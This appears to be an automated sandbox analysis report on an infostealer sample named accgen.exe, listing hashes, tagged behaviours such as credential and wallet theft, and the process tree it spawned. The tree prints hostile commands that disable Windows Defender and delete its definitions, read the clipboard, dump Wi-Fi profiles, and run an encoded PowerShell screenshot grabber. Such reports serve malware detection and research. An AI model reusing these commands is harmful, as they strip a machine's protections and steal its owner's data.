Resubmissions
11-12-2024 20:16
241211-y2jj2a1pbn 1007-12-2024 23:58
241207-31ftzawpbl 1006-12-2024 00:18
241206-al2hxazlh1 1005-12-2024 20:14
241205-yz2b3awpfq 1005-12-2024 18:42
241205-xcrnnswqgs 1005-12-2024 02:56
241205-dfenqs1mbl 1005-12-2024 02:56
241205-de5tja1maj 1005-12-2024 00:22
241205-an7gyavkal 1004-12-2024 22:51
241204-2s976s1mhj 10Analysis
-
max time kernel
95s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 22:51
Behavioral task
behavioral1
Sample
accgen.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
accgen.exe
Resource
win10v2004-20241007-en
General
-
Target
accgen.exe
-
Size
7.5MB
-
MD5
f1c9d53dc67cafd6d193be9a4b33f627
-
SHA1
dc1de348ba0cd40c6b10cb528e7aee83072c6aa0
-
SHA256
45715d3b3c58ea90088529b234c4ebb34a005c5d7406b4a92a3e116aa28c26c2
-
SHA512
aaba4de3b7e9bd1e8c41e655cbe29addcbe98f62f4b6ad599fe7a59e4616881ca97a91ae0a457df0421d586eb586a13f62aff10907a386f1cf3a25be7fa6244c
-
SSDEEP
196608:WlQCwVhurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1J:LVhurEUWjqeWx06rYYJ
Malware Config
Signatures
-
pid Process 2036 powershell.exe 388 powershell.exe 416 powershell.exe 2364 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts accgen.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1824 cmd.exe 640 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1448 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe 4612 accgen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com 7 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2016 tasklist.exe 1752 tasklist.exe 4032 tasklist.exe 3104 tasklist.exe 3796 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b8d-21.dat upx behavioral2/memory/4612-25-0x00007FF993580000-0x00007FF993C44000-memory.dmp upx behavioral2/files/0x0031000000023b80-27.dat upx behavioral2/memory/4612-30-0x00007FF9A6810000-0x00007FF9A6835000-memory.dmp upx behavioral2/files/0x000a000000023b8b-29.dat upx behavioral2/files/0x000a000000023b8a-33.dat upx behavioral2/memory/4612-48-0x00007FF9AA460000-0x00007FF9AA46F000-memory.dmp upx behavioral2/files/0x000a000000023b87-47.dat upx behavioral2/files/0x000a000000023b86-46.dat upx behavioral2/files/0x000a000000023b85-45.dat upx behavioral2/files/0x000a000000023b84-44.dat upx behavioral2/files/0x000a000000023b83-43.dat upx behavioral2/files/0x000a000000023b82-42.dat upx behavioral2/files/0x0031000000023b81-41.dat upx behavioral2/files/0x0031000000023b7f-40.dat upx behavioral2/files/0x000a000000023b92-39.dat upx behavioral2/files/0x000a000000023b91-38.dat upx behavioral2/files/0x000a000000023b90-37.dat upx behavioral2/files/0x000a000000023b8c-34.dat upx behavioral2/memory/4612-54-0x00007FF9A62E0000-0x00007FF9A630D000-memory.dmp upx behavioral2/memory/4612-56-0x00007FF9A8760000-0x00007FF9A877A000-memory.dmp upx behavioral2/memory/4612-58-0x00007FF9A62B0000-0x00007FF9A62D4000-memory.dmp upx behavioral2/memory/4612-60-0x00007FF9A2C10000-0x00007FF9A2D8F000-memory.dmp upx behavioral2/memory/4612-64-0x00007FF9A8830000-0x00007FF9A883D000-memory.dmp upx behavioral2/memory/4612-63-0x00007FF9A7250000-0x00007FF9A7269000-memory.dmp upx behavioral2/memory/4612-70-0x00007FF9A6270000-0x00007FF9A62A3000-memory.dmp upx behavioral2/memory/4612-69-0x00007FF993580000-0x00007FF993C44000-memory.dmp upx behavioral2/memory/4612-71-0x00007FF993050000-0x00007FF993579000-memory.dmp upx behavioral2/memory/4612-73-0x00007FF9A29C0000-0x00007FF9A2A8D000-memory.dmp upx behavioral2/memory/4612-78-0x00007FF9A6150000-0x00007FF9A615D000-memory.dmp upx behavioral2/memory/4612-80-0x00007FF9A28A0000-0x00007FF9A29BB000-memory.dmp upx behavioral2/memory/4612-77-0x00007FF9A6250000-0x00007FF9A6264000-memory.dmp upx behavioral2/memory/4612-75-0x00007FF9A6810000-0x00007FF9A6835000-memory.dmp upx behavioral2/memory/4612-93-0x00007FF9A62B0000-0x00007FF9A62D4000-memory.dmp upx behavioral2/memory/4612-110-0x00007FF9A2C10000-0x00007FF9A2D8F000-memory.dmp upx behavioral2/memory/4612-231-0x00007FF9A6270000-0x00007FF9A62A3000-memory.dmp upx behavioral2/memory/4612-232-0x00007FF993050000-0x00007FF993579000-memory.dmp upx behavioral2/memory/4612-298-0x00007FF9A29C0000-0x00007FF9A2A8D000-memory.dmp upx behavioral2/memory/4612-324-0x00007FF9A2C10000-0x00007FF9A2D8F000-memory.dmp upx behavioral2/memory/4612-319-0x00007FF9A6810000-0x00007FF9A6835000-memory.dmp upx behavioral2/memory/4612-318-0x00007FF993580000-0x00007FF993C44000-memory.dmp upx behavioral2/memory/4612-353-0x00007FF993580000-0x00007FF993C44000-memory.dmp upx behavioral2/memory/4612-375-0x00007FF9A7250000-0x00007FF9A7269000-memory.dmp upx behavioral2/memory/4612-381-0x00007FF9A28A0000-0x00007FF9A29BB000-memory.dmp upx behavioral2/memory/4612-380-0x00007FF9A6250000-0x00007FF9A6264000-memory.dmp upx behavioral2/memory/4612-379-0x00007FF9A6150000-0x00007FF9A615D000-memory.dmp upx behavioral2/memory/4612-378-0x00007FF993050000-0x00007FF993579000-memory.dmp upx behavioral2/memory/4612-377-0x00007FF9A6270000-0x00007FF9A62A3000-memory.dmp upx behavioral2/memory/4612-376-0x00007FF9A29C0000-0x00007FF9A2A8D000-memory.dmp upx behavioral2/memory/4612-374-0x00007FF9A2C10000-0x00007FF9A2D8F000-memory.dmp upx behavioral2/memory/4612-373-0x00007FF9A62B0000-0x00007FF9A62D4000-memory.dmp upx behavioral2/memory/4612-372-0x00007FF9A8760000-0x00007FF9A877A000-memory.dmp upx behavioral2/memory/4612-371-0x00007FF9A62E0000-0x00007FF9A630D000-memory.dmp upx behavioral2/memory/4612-370-0x00007FF9AA460000-0x00007FF9AA46F000-memory.dmp upx behavioral2/memory/4612-369-0x00007FF9A6810000-0x00007FF9A6835000-memory.dmp upx behavioral2/memory/4612-368-0x00007FF9A8830000-0x00007FF9A883D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1992 cmd.exe 4296 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4464 WMIC.exe 3796 WMIC.exe 1784 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4236 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2364 powershell.exe 2364 powershell.exe 2036 powershell.exe 2036 powershell.exe 2560 powershell.exe 2560 powershell.exe 2560 powershell.exe 388 powershell.exe 388 powershell.exe 1704 powershell.exe 1704 powershell.exe 416 powershell.exe 416 powershell.exe 1064 powershell.exe 1064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 WMIC.exe Token: SeSecurityPrivilege 5104 WMIC.exe Token: SeTakeOwnershipPrivilege 5104 WMIC.exe Token: SeLoadDriverPrivilege 5104 WMIC.exe Token: SeSystemProfilePrivilege 5104 WMIC.exe Token: SeSystemtimePrivilege 5104 WMIC.exe Token: SeProfSingleProcessPrivilege 5104 WMIC.exe Token: SeIncBasePriorityPrivilege 5104 WMIC.exe Token: SeCreatePagefilePrivilege 5104 WMIC.exe Token: SeBackupPrivilege 5104 WMIC.exe Token: SeRestorePrivilege 5104 WMIC.exe Token: SeShutdownPrivilege 5104 WMIC.exe Token: SeDebugPrivilege 5104 WMIC.exe Token: SeSystemEnvironmentPrivilege 5104 WMIC.exe Token: SeRemoteShutdownPrivilege 5104 WMIC.exe Token: SeUndockPrivilege 5104 WMIC.exe Token: SeManageVolumePrivilege 5104 WMIC.exe Token: 33 5104 WMIC.exe Token: 34 5104 WMIC.exe Token: 35 5104 WMIC.exe Token: 36 5104 WMIC.exe Token: SeDebugPrivilege 2016 tasklist.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeIncreaseQuotaPrivilege 5104 WMIC.exe Token: SeSecurityPrivilege 5104 WMIC.exe Token: SeTakeOwnershipPrivilege 5104 WMIC.exe Token: SeLoadDriverPrivilege 5104 WMIC.exe Token: SeSystemProfilePrivilege 5104 WMIC.exe Token: SeSystemtimePrivilege 5104 WMIC.exe Token: SeProfSingleProcessPrivilege 5104 WMIC.exe Token: SeIncBasePriorityPrivilege 5104 WMIC.exe Token: SeCreatePagefilePrivilege 5104 WMIC.exe Token: SeBackupPrivilege 5104 WMIC.exe Token: SeRestorePrivilege 5104 WMIC.exe Token: SeShutdownPrivilege 5104 WMIC.exe Token: SeDebugPrivilege 5104 WMIC.exe Token: SeSystemEnvironmentPrivilege 5104 WMIC.exe Token: SeRemoteShutdownPrivilege 5104 WMIC.exe Token: SeUndockPrivilege 5104 WMIC.exe Token: SeManageVolumePrivilege 5104 WMIC.exe Token: 33 5104 WMIC.exe Token: 34 5104 WMIC.exe Token: 35 5104 WMIC.exe Token: 36 5104 WMIC.exe Token: SeIncreaseQuotaPrivilege 4464 WMIC.exe Token: SeSecurityPrivilege 4464 WMIC.exe Token: SeTakeOwnershipPrivilege 4464 WMIC.exe Token: SeLoadDriverPrivilege 4464 WMIC.exe Token: SeSystemProfilePrivilege 4464 WMIC.exe Token: SeSystemtimePrivilege 4464 WMIC.exe Token: SeProfSingleProcessPrivilege 4464 WMIC.exe Token: SeIncBasePriorityPrivilege 4464 WMIC.exe Token: SeCreatePagefilePrivilege 4464 WMIC.exe Token: SeBackupPrivilege 4464 WMIC.exe Token: SeRestorePrivilege 4464 WMIC.exe Token: SeShutdownPrivilege 4464 WMIC.exe Token: SeDebugPrivilege 4464 WMIC.exe Token: SeSystemEnvironmentPrivilege 4464 WMIC.exe Token: SeRemoteShutdownPrivilege 4464 WMIC.exe Token: SeUndockPrivilege 4464 WMIC.exe Token: SeManageVolumePrivilege 4464 WMIC.exe Token: 33 4464 WMIC.exe Token: 34 4464 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4736 wrote to memory of 4612 4736 accgen.exe 82 PID 4736 wrote to memory of 4612 4736 accgen.exe 82 PID 4612 wrote to memory of 1088 4612 accgen.exe 83 PID 4612 wrote to memory of 1088 4612 accgen.exe 83 PID 4612 wrote to memory of 952 4612 accgen.exe 84 PID 4612 wrote to memory of 952 4612 accgen.exe 84 PID 4612 wrote to memory of 3524 4612 accgen.exe 86 PID 4612 wrote to memory of 3524 4612 accgen.exe 86 PID 4612 wrote to memory of 5116 4612 accgen.exe 89 PID 4612 wrote to memory of 5116 4612 accgen.exe 89 PID 1088 wrote to memory of 2364 1088 cmd.exe 91 PID 1088 wrote to memory of 2364 1088 cmd.exe 91 PID 3524 wrote to memory of 2016 3524 cmd.exe 92 PID 3524 wrote to memory of 2016 3524 cmd.exe 92 PID 5116 wrote to memory of 5104 5116 cmd.exe 93 PID 5116 wrote to memory of 5104 5116 cmd.exe 93 PID 952 wrote to memory of 2036 952 cmd.exe 94 PID 952 wrote to memory of 2036 952 cmd.exe 94 PID 4612 wrote to memory of 4216 4612 accgen.exe 96 PID 4612 wrote to memory of 4216 4612 accgen.exe 96 PID 4216 wrote to memory of 1396 4216 cmd.exe 98 PID 4216 wrote to memory of 1396 4216 cmd.exe 98 PID 4612 wrote to memory of 880 4612 accgen.exe 99 PID 4612 wrote to memory of 880 4612 accgen.exe 99 PID 880 wrote to memory of 836 880 cmd.exe 101 PID 880 wrote to memory of 836 880 cmd.exe 101 PID 4612 wrote to memory of 2912 4612 accgen.exe 102 PID 4612 wrote to memory of 2912 4612 accgen.exe 102 PID 2912 wrote to memory of 4464 2912 cmd.exe 104 PID 2912 wrote to memory of 4464 2912 cmd.exe 104 PID 4612 wrote to memory of 3148 4612 accgen.exe 105 PID 4612 wrote to memory of 3148 4612 accgen.exe 105 PID 3148 wrote to memory of 3796 3148 cmd.exe 154 PID 3148 wrote to memory of 3796 3148 cmd.exe 154 PID 4612 wrote to memory of 4488 4612 accgen.exe 108 PID 4612 wrote to memory of 4488 4612 accgen.exe 108 PID 4612 wrote to memory of 1952 4612 accgen.exe 109 PID 4612 wrote to memory of 1952 4612 accgen.exe 109 PID 4488 wrote to memory of 1752 4488 cmd.exe 112 PID 4488 wrote to memory of 1752 4488 cmd.exe 112 PID 1952 wrote to memory of 4032 1952 cmd.exe 113 PID 1952 wrote to memory of 4032 1952 cmd.exe 113 PID 4612 wrote to memory of 2944 4612 accgen.exe 114 PID 4612 wrote to memory of 2944 4612 accgen.exe 114 PID 4612 wrote to memory of 1824 4612 accgen.exe 115 PID 4612 wrote to memory of 1824 4612 accgen.exe 115 PID 4612 wrote to memory of 2172 4612 accgen.exe 117 PID 4612 wrote to memory of 2172 4612 accgen.exe 117 PID 4612 wrote to memory of 1708 4612 accgen.exe 119 PID 4612 wrote to memory of 1708 4612 accgen.exe 119 PID 4612 wrote to memory of 1992 4612 accgen.exe 121 PID 4612 wrote to memory of 1992 4612 accgen.exe 121 PID 2944 wrote to memory of 3572 2944 cmd.exe 125 PID 2944 wrote to memory of 3572 2944 cmd.exe 125 PID 1708 wrote to memory of 752 1708 cmd.exe 124 PID 1708 wrote to memory of 752 1708 cmd.exe 124 PID 1824 wrote to memory of 640 1824 cmd.exe 126 PID 1824 wrote to memory of 640 1824 cmd.exe 126 PID 4612 wrote to memory of 1644 4612 accgen.exe 128 PID 4612 wrote to memory of 1644 4612 accgen.exe 128 PID 4612 wrote to memory of 2540 4612 accgen.exe 129 PID 4612 wrote to memory of 2540 4612 accgen.exe 129 PID 1992 wrote to memory of 4296 1992 cmd.exe 127 PID 1992 wrote to memory of 4296 1992 cmd.exe 127 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4168 attrib.exe 1448 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\accgen.exe"C:\Users\Admin\AppData\Local\Temp\accgen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\accgen.exe"C:\Users\Admin\AppData\Local\Temp\accgen.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2172
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1644
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2540
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2732
-
